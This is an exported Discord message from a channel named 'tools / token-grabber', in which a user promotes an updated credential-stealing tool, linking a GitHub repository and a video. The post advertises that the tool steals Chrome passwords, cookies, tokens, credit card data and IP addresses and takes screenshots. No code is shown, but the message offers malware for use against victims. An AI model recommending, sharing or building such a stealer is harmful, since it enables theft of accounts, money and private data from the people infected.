==============================================================
Guild: VAULT ALL LOCKERS NEED |  /prediction
Channel: tools / token-grabber
==============================================================

[PM] xeno#0666
Updated version of https://github.com/Rdimo/Hazard-Token-Grabber This one packs alot more punch and steals google chrome passwords, cookies, tokens, credit card, ip takes screenshot and more!

https://github.com/Rdimo/Hazard-Token-Grabber-V2

https://youtu.be/iG4fsqUwcoQ


==============================================================
Exported 1 message(s)
==============================================================
